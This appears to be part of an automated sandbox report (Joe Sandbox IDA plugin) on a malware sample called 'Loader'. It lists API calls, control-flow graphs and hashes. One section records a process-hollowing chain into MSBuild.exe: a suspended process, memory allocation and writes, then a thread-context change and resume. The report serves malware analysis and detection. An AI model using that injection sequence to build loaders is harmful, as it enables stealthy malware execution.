                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,002E5110,002E5100), ref: 002E5334
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 002E5347
                                                                                      • Wow64GetThreadContext.KERNEL32(0000010C,00000000), ref: 002E5365
                                                                                      • ReadProcessMemory.KERNELBASE(00000110,?,002E5154,00000004,00000000), ref: 002E5389
                                                                                      • VirtualAllocEx.KERNELBASE(00000110,?,?,00003000,00000040), ref: 002E53B4
                                                                                      • WriteProcessMemory.KERNELBASE(00000110,00000000,?,?,00000000,?), ref: 002E540C
                                                                                      • WriteProcessMemory.KERNELBASE(00000110,00400000,?,?,00000000,?,00000028), ref: 002E5457
                                                                                      • WriteProcessMemory.KERNELBASE(00000110,?,?,00000004,00000000), ref: 002E5495
                                                                                      • Wow64SetThreadContext.KERNEL32(0000010C,02970000), ref: 002E54D1
                                                                                      • ResumeThread.KERNELBASE(0000010C), ref: 002E54E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                      • API String ID: 2687962208-3857624555
                                                                                      • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                      • Instruction ID: ef8996d9474a367b166b3b7441295f4094ce50b3ef222ada984296de7a71d71b
                                                                                      • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                      • Instruction Fuzzy Hash: BEB1197265068AAFDB60CF69CC80BDA73A5FF88714F158164EA0CAB341D770FA51CB94

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AddressCloseCreateHandleProcSize
                                                                                      • String ID: .bss$CreateFileA
                                                                                      • API String ID: 2547132502-2231744822
                                                                                      • Opcode ID: 0d2fccd01840c9be2537270730223f92c68378e9c0c4bcabbab06c3e47172f57
                                                                                      • Instruction ID: f306439cce8e6f0c5ba791ae0bc4a9148705a010d98be24bbabee87634da760a
                                                                                      • Opcode Fuzzy Hash: 0d2fccd01840c9be2537270730223f92c68378e9c0c4bcabbab06c3e47172f57
                                                                                      • Instruction Fuzzy Hash: 4371BFB4D14249CFDB00DFA8D588BAEBBF0BF49314F108429E855AB350D774A969CF52

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProcProtectVirtual
                                                                                      • String ID: @$VirtualProtect
                                                                                      • API String ID: 3759838892-29487290
                                                                                      • Opcode ID: 2ffb873451b8dc42cfa5284d220937cbbf0f6933b10bd486c4d990f93e0b6280
                                                                                      • Instruction ID: 932f930a9d65b8bf0f05ab910825c9bc38c5b5d0cf305bd5993d48030f0370f4
                                                                                      • Opcode Fuzzy Hash: 2ffb873451b8dc42cfa5284d220937cbbf0f6933b10bd486c4d990f93e0b6280
                                                                                      • Instruction Fuzzy Hash: 9141E4B0D10209DFDB04DFA9E59869EBBF0FF48358F10842AE848AB350D7759954CF91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 68 2c9e94-2c9eb6 69 2c9ebc-2c9ebe 68->69 70 2ca0a9 68->70 71 2c9eea-2c9f0d 69->71 72 2c9ec0-2c9edf call 2be728 69->72 73 2ca0ab-2ca0af 70->73 75 2c9f0f-2c9f11 71->75 76 2c9f13-2c9f19 71->76 79 2c9ee2-2c9ee5 72->79 75->76 78 2c9f1b-2c9f2c 75->78 76->72 76->78 80 2c9f2e-2c9f3c call 2c8c42 78->80 81 2c9f3f-2c9f4f call 2ca1c1 78->81 79->73 80->81 86 2c9f98-2c9faa 81->86 87 2c9f51-2c9f57 81->87 88 2c9fac-2c9fb2 86->88 89 2ca001-2ca021 WriteFile 86->89 90 2c9f59-2c9f5c 87->90 91 2c9f80-2c9f96 call 2ca23e 87->91 92 2c9fed-2c9ffa call 2ca66d 88->92 93 2c9fb4-2c9fb7 88->93 96 2ca02c 89->96 97 2ca023-2ca029 GetLastError 89->97 94 2c9f5e-2c9f61 90->94 95 2c9f67-2c9f76 call 2ca605 90->95 113 2c9f79-2c9f7b 91->113 112 2c9fff 92->112 99 2c9fd9-2c9feb call 2ca831 93->99 100 2c9fb9-2c9fbc 93->100 94->95 101 2ca041-2ca044 94->101 95->113 105 2ca02f-2ca03a 96->105 97->96 118 2c9fd4-2c9fd7 99->118 108 2ca047-2ca049 100->108 109 2c9fc2-2c9fcf call 2ca748 100->109 101->108 106 2ca03c-2ca03f 105->106 107 2ca0a4-2ca0a7 105->107 106->101 107->73 114 2ca04b-2ca050 108->114 115 2ca077-2ca083 108->115 109->118 112->118 113->105 119 2ca069-2ca072 call 2bdf20 114->119 120 2ca052-2ca064 114->120 121 2ca08d-2ca09f 115->121 122 2ca085-2ca08b 115->122 118->113 119->79 120->79 121->79 122->70 122->121
                                                                                      APIs
                                                                                        • Part of subcall function 002CA23E: GetConsoleOutputCP.KERNEL32(83182907,00000000,00000000,?), ref: 002CA2A1
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,002BA3B2,?,002BA614), ref: 002CA019
                                                                                      • GetLastError.KERNEL32(?,002BA3B2,?,002BA614,?,002BA614,?,?,?,?,?,?,?,00000000,?,?), ref: 002CA023
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorFileLastOutputWrite
                                                                                      • String ID:
                                                                                      • API String ID: 2915228174-0
                                                                                      • Opcode ID: 27b7ea10fccd0cce891f962bbeb33cfbc20b194d40a44986006a82999b407d69
                                                                                      • Instruction ID: e37cf94d349c62fbd642ad682027a6020a7cfb2952c6051709a0a2b07597cdbc
                                                                                      • Opcode Fuzzy Hash: 27b7ea10fccd0cce891f962bbeb33cfbc20b194d40a44986006a82999b407d69
                                                                                      • Instruction Fuzzy Hash: 1161B47192015EAFDF11CFA8C888FEE7BB9AF49348F14024DE804A7251D372D961CB61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 125 2ca66d-2ca6c2 call 2b6a30 128 2ca6c4 125->128 129 2ca737-2ca747 call 2b2ab1 125->129 130 2ca6ca 128->130 132 2ca6d0-2ca6d2 130->132 134 2ca6ec-2ca711 WriteFile 132->134 135 2ca6d4-2ca6d9 132->135 138 2ca72f-2ca735 GetLastError 134->138 139 2ca713-2ca71e 134->139 136 2ca6db-2ca6e1 135->136 137 2ca6e2-2ca6ea 135->137 136->137 137->132 137->134 138->129 139->129 140 2ca720-2ca72b 139->140 140->130 141 2ca72d 140->141 141->129
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,002C9FFF,?,002BA614,?,?,?,00000000), ref: 002CA709
                                                                                      • GetLastError.KERNEL32(?,002C9FFF,?,002BA614,?,?,?,00000000,?,?,?,?,?,002BA3B2,?,002BA614), ref: 002CA72F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID:
                                                                                      • API String ID: 442123175-0
                                                                                      • Opcode ID: 4174fcfadaea6e140818e0a876434f813e8f4d3559394482e10c99d8d1788483
                                                                                      • Instruction ID: b348be0dde4d4e301d2a1275282992b77a36525740b9e5e0d7afd0216a85785c
                                                                                      • Opcode Fuzzy Hash: 4174fcfadaea6e140818e0a876434f813e8f4d3559394482e10c99d8d1788483
                                                                                      • Instruction Fuzzy Hash: 8221D030A1025C8FCF15CF29DC80AEDB7B9EB48309F2441ADE94AD7211D630DE56CB61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 142 2c3d32-2c3d37 143 2c3d39-2c3d51 142->143 144 2c3d5f-2c3d68 143->144 145 2c3d53-2c3d57 143->145 147 2c3d7a 144->147 148 2c3d6a-2c3d6d 144->148 145->144 146 2c3d59-2c3d5d 145->146 149 2c3dd4-2c3dd8 146->149 152 2c3d7c-2c3d89 GetStdHandle 147->152 150 2c3d6f-2c3d74 148->150 151 2c3d76-2c3d78 148->151 149->143 153 2c3dde-2c3de1 149->153 150->152 151->152 154 2c3d8b-2c3d8d 152->154 155 2c3db6-2c3dc8 152->155 154->155 157 2c3d8f-2c3d98 GetFileType 154->157 155->149 156 2c3dca-2c3dcd 155->156 156->149 157->155 158 2c3d9a-2c3da3 157->158 159 2c3dab-2c3dae 158->159 160 2c3da5-2c3da9 158->160 159->149 161 2c3db0-2c3db4 159->161 160->149 161->149
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,002C3C21,002E41E0,0000000C), ref: 002C3D7E
                                                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,002C3C21,002E41E0,0000000C), ref: 002C3D90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType
                                                                                      • String ID:
                                                                                      • API String ID: 3000768030-0
                                                                                      • Opcode ID: 93ad3ea04e2d86050bcce767740e130af25fef7acc8dfa8706afb3d9bea85988
                                                                                      • Instruction ID: 9590fde62a6c6fd67a06d80db0279aaa0b1a9f6820175f8a403e62f4204f9baa
                                                                                      • Opcode Fuzzy Hash: 93ad3ea04e2d86050bcce767740e130af25fef7acc8dfa8706afb3d9bea85988
                                                                                      • Instruction Fuzzy Hash: CA11B4712247428ACB30CE3E9CC8F22BAA4A757331B384F1DE5B7861F1C670DA66D251

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleEqualFree
                                                                                      • String ID:
                                                                                      • API String ID: 2476253921-0
                                                                                      • Opcode ID: 96ee0b6dc1d168c908d2af69f23314b790b6249d52b2418914d0a0f7e078b7f4
                                                                                      • Instruction ID: 4ebe05931b9847dd5fcd23326766bb48767ebbbc0269b92e6344dd9cfb885fd2
                                                                                      • Opcode Fuzzy Hash: 96ee0b6dc1d168c908d2af69f23314b790b6249d52b2418914d0a0f7e078b7f4
                                                                                      • Instruction Fuzzy Hash: 0B21BBB0510B448FC320DF2AD995746BBF0FB09714F404A2DE5AA8BB90D775B918CF91

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32 ref: 002A1FE8
                                                                                      • GetModuleFileNameW.KERNEL32 ref: 002A2008
                                                                                        • Part of subcall function 002A1D60: GetProcAddress.KERNEL32 ref: 002A1DA0
                                                                                        • Part of subcall function 002A1D60: CreateFileA.KERNELBASE ref: 002A1DF9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileModule$AddressCreateHandleNameProc
                                                                                      • String ID:
                                                                                      • API String ID: 4167556020-0
                                                                                      • Opcode ID: b0e07f0f9c78536936a4040b7dd85bbc9238ce82850f4eded41316bddd4fc122
                                                                                      • Instruction ID: cde38bd7eecae778cc59da5bb8ad9fd6bfe798efcd82ac320daf24f4a459269c
                                                                                      • Opcode Fuzzy Hash: b0e07f0f9c78536936a4040b7dd85bbc9238ce82850f4eded41316bddd4fc122
                                                                                      • Instruction Fuzzy Hash: 21012CB09043088FD714EF68E58979EBBF4EB08300F4045ADE489C7341EB305A98CF52

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 177 2c2257-2c2260 178 2c228f-2c2290 177->178 179 2c2262-2c2275 RtlFreeHeap 177->179 179->178 180 2c2277-2c228e GetLastError call 2bdedd call 2bde94 179->180 180->178
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,002C6554,?,00000000,?,?,002C61F4,?,00000007,?,?,002C6B3A,?,?), ref: 002C226D
                                                                                      • GetLastError.KERNEL32(?,?,002C6554,?,00000000,?,?,002C61F4,?,00000007,?,?,002C6B3A,?,?), ref: 002C2278
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: 73b46e592f085bef7876e13212d12ed4dbf433ae67f45175c629c896decc332d
                                                                                      • Instruction ID: c6a1dd7c975154fce2079aee1abc82b2d5e2794abe9688673c4318a1ea97ae2d
                                                                                      • Opcode Fuzzy Hash: 73b46e592f085bef7876e13212d12ed4dbf433ae67f45175c629c896decc332d
                                                                                      • Instruction Fuzzy Hash: ACE08C32140249ABDB216FA0BC0CBD93BD9AF10791F540624FA0C8E064EE34C8A0CB94

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 241 2a14c0-2a152f call 2bff30 call 2a3430 246 2a1560-2a156a 241->246 247 2a1535-2a1555 call 2a3430 241->247 248 2a1597-2a15be call 2a3450 call 2a3560 246->248 255 2a155b 247->255 256 2a156f-2a1592 call 2a3430 247->256 260 2a15d2-2a162c call 2a3730 call 2a3580 call 2a3760 call 2a37d0 248->260 261 2a15c4-2a15cd 248->261 255->246 256->248 277 2a1632 260->277 278 2a16e1 260->278 262 2a18b5-2a1903 call 2a39b0 call 2a3a00 261->262 279 2a1637-2a1643 277->279 280 2a16e6-2a16ef 278->280 281 2a1649-2a16b1 call 2a3810 call 2a38e0 call 2a3830 call 2a3900 call 2a37f0 279->281 282 2a16dc 279->282 283 2a1707-2a170c 280->283 284 2a16f5-2a1704 280->284 326 2a16bc-2a16c5 281->326 327 2a16b7-2a16d7 281->327 282->278 286 2a1712-2a17c0 283->286 287 2a1717-2a175c call 2a3810 call 2a3910 call 2a3830 283->287 284->283 292 2a1891-2a18b0 call 2a3960 286->292 293 2a17c6 286->293 312 2a1761-2a178d call 2a3900 call 2a37f0 287->312 292->262 297 2a17cb-2a17d7 293->297 301 2a188c 297->301 302 2a17dd-2a1861 call 2a3810 call 2a38e0 call 2a3830 call 2a3900 call 2a37f0 297->302 301->292 338 2a186c-2a1875 302->338 339 2a1867-2a1887 302->339 332 2a1798-2a179e 312->332 333 2a1793 312->333 326->282 327->279 335 2a17a1-2a17b7 332->335 333->335 335->280 338->301 339->297
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen
                                                                                      • String ID:
                                                                                      • API String ID: 4218353326-0
                                                                                      • Opcode ID: 73814705237dc3b7d235e0eee8f4790636fed67be2a7a0423a39db17ba691769
                                                                                      • Instruction ID: 7d4886cbfa0dedd6d8be7f784aec4242fc20bdf7417ef38e15215096a1a84f8e
                                                                                      • Opcode Fuzzy Hash: 73814705237dc3b7d235e0eee8f4790636fed67be2a7a0423a39db17ba691769
                                                                                      • Instruction Fuzzy Hash: 9ED116B4624B408FC724DF28C555A66BBE0BF0A724F148A1DE8978BB91DB74F924CF41

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 341 2b4c50-2b4c75 342 2b4c7e-2b4c86 341->342 343 2b4c77-2b4c79 341->343 344 2b4c88-2b4c92 342->344 345 2b4cae-2b4cb2 342->345 346 2b4d70-2b4d7d call 2b2ab1 343->346 344->345 347 2b4c94-2b4ca9 344->347 348 2b4d6a 345->348 349 2b4cb8-2b4cc7 call 2b53b3 345->349 351 2b4d6f 347->351 348->351 355 2b4cc9-2b4ccd 349->355 356 2b4ccf-2b4d04 349->356 351->346 357 2b4d17 call 2b4764 355->357 362 2b4d30-2b4d38 356->362 363 2b4d06-2b4d09 356->363 360 2b4d1c-2b4d2e 357->360 360->351 364 2b4d3a-2b4d4b call 2bf661 362->364 365 2b4d4d-2b4d68 362->365 363->362 366 2b4d0b-2b4d0f 363->366 364->348 364->365 365->351 366->348 368 2b4d11-2b4d14 366->368 368->357
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc931ca2d226611f7783f908e06a002ac17e6b180c7d76514a67395ba38099d2
                                                                                      • Instruction ID: 821ba11b866be477a5ca7f9002f7fedf670168bc0fc28498e3479124dd8cbd76
                                                                                      • Opcode Fuzzy Hash: bc931ca2d226611f7783f908e06a002ac17e6b180c7d76514a67395ba38099d2
                                                                                      • Instruction Fuzzy Hash: BE41A031A2011BAFCB14EFA8C4909EDB7B9FF49384B54412AE441E7651EB30E960CB90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 370 2b3370-2b33a1 call 2b32d7 373 2b33a3-2b33b6 call 2a8520 call 2b5cc2 370->373 374 2b33b7-2b33c1 call 2b32d7 370->374 373->374 379 2b33dd-2b33eb 374->379 380 2b33c3-2b33d1 call 2b32ba 374->380 387 2b33ed-2b33f6 call 2b32d7 379->387 380->379 386 2b33d3-2b33d7 FreeLibraryWhenCallbackReturns 380->386 386->379 390 2b33f8-2b3415 call 2a8520 call 2b5cc2 387->390 391 2b3422-2b3430 387->391 390->391 396 2b3417-2b3421 call 2b57fd 390->396 396->391
                                                                                      APIs
                                                                                        • Part of subcall function 002B32D7: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,002B329A,?,?,002B326B,?), ref: 002B32E3
                                                                                      • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,83182907,?,?,?,002D2EA9,000000FF), ref: 002B33D7
                                                                                        • Part of subcall function 002A8520: std::_Throw_Cpp_error.LIBCPMT ref: 002A854C
                                                                                        • Part of subcall function 002A8520: std::_Throw_Cpp_error.LIBCPMT ref: 002A8568
                                                                                        • Part of subcall function 002B5CC2: ReleaseSRWLockExclusive.KERNEL32(?,?,?,002A85E9,?,002AE853), ref: 002B5CD7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
                                                                                      • String ID:
                                                                                      • API String ID: 1423221283-0
